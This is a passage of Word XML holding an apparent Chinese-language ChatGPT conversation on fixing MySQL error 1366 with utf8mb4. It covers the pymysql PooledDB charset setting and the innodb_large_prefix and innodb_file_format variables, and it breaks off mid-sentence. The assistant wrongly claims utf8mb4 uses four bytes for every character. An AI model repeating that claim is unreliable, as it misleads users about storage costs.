    <w:p w14:paraId="1649EA2E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1366</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常表示试图插入的数据不能在当前的字符集或者列定义下被正确存储。你的情况看起来是在尝试将一个包含四字节字符（比如某些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的字符串插入到一个字符集为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的列中，这本应该是被允许的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA99A30" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018CF51D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本支持四字节字符：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL 5.5.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本及以后开始支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集，如果你使用的是更早版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可能需要升级你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A40C90" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B82BE8B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接也使用了正确的字符集：即使你的表使用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是如果你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接使用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者其他不支持四字节字符的字符集，你也可能会遇到这个问题。你可以检查你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动的文档，看看如何在连接时指定字符集。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D48B63" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F42F97" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innodb_large_prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被设置为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innodb_file_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被设置为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Barracuda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这两个变量会影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格的索引长度，可能影响到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD29526" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB0BA81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你做了上述所有事情，但问题依然存在，你可能需要联系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的支持或者你的系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>管理员，看看是否存在其他的配置或者环境问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFCFB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FF7133" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import pymysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A67857" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from dbutils.pooled_db import PooledDB mysql_pool = PooledDB(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B635EAD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pymysql, 50, host=mysql_host, user=mysql_user, passwd=mysql_passwd, port=mysql_port, db=mysql_db, maxconnections=None,blocking=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33C7BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何指定我的连接是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf8mb4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382CD5E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0D6709" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5936C6F1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PooledDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接时，你可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来指定字符集。这样，所有通过这个连接池创建的连接都会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集。你的代码可以修改为如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B035D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3CCB44" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664EF0A7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysql_pool = PooledDB(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7327BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pymysql, 50, host=mysql_host, user=mysql_user, passwd=mysql_passwd, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C834CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    port=mysql_port, db=mysql_db, maxconnections=None,blocking=True, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EB70D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    charset='utf8mb4' # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加这一行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE13CFF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEDE338" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6732BA5A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会稍微增加数据存储的需求，因为它会为每个字符分配四个字节的存储空间。然而，考虑到它能够正确处理所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符（包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），这通常是一个值得接受的代价。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2023F4D3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E740C3C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innodb_large_prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被设置为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innodb_file_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被设置为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Barracuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65061B82" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A2F88" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDE3E10" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以通过运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询来查看这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统变量的值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FFB47E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BC26F4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2F4F08" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SHOW VARIABLES LIKE 'innodb_large_prefix';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7D16D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SHOW VARIABLES LIKE 'innodb_file_format';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A358A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E54BB2F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> innodb_large_prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你希望看到的结果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DE1ED" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF1117E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> innodb_file_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你希望看到的结果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Barracuda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D390B28" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506DC516" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你看到的结果不是你期望的，你需要更改这些变量的值。你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (my.cnf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> my.ini) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置这些值。在文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [mysqld] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分，添加或修改以下行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EC8BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D7DC25" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2536FC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[mysqld]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB1639" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>innodb_large_prefix=ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5056C7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>innodb_file_format=Barracuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E1AD7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F8580A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，你需要重新启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器来应用这些更改。注意，对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> innodb_file_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可能还需要确认你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> innodb_file_per_table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是打开的，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Barracuda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
